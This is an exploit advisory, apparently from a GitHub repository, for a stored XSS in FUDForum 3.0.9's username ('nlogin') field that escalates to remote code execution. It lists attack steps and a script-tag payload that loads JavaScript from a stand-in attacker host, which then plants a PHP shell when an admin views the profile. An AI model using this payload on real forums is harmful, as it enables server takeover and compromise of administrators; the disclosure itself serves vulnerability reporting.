Skip to content

Latest commit

 

History

History
24 lines (16 loc) · 1.23 KB

File metadata and controls

24 lines (16 loc) · 1.23 KB

FUDForum 3.0.9 - Stored XSS / Remote Code Execution [via username]

Greetz : wetw0rk, Fr13ndz, offsec

Description: FUDForum 3.0.9 is vulnerable to Stored XSS via the "nlogin" parameter. This may result in remote code execution. An attacker can use a user account to fully compromise the system using a POST request. When the admin visits the user information the payload will execute. This will allow for PHP files to be written to the web root, and for code to execute on the remote server.

Notes:

  1. Register an account and log in to the forum.

  2. Go to the user control panel. -> Account Settings -> change login

  3. Insert javascript payload <script/src="http://attacker.machine/fud.js"></script>

  4. When the admin visits the user information the payload will fire, uploading a php shell on the remote system.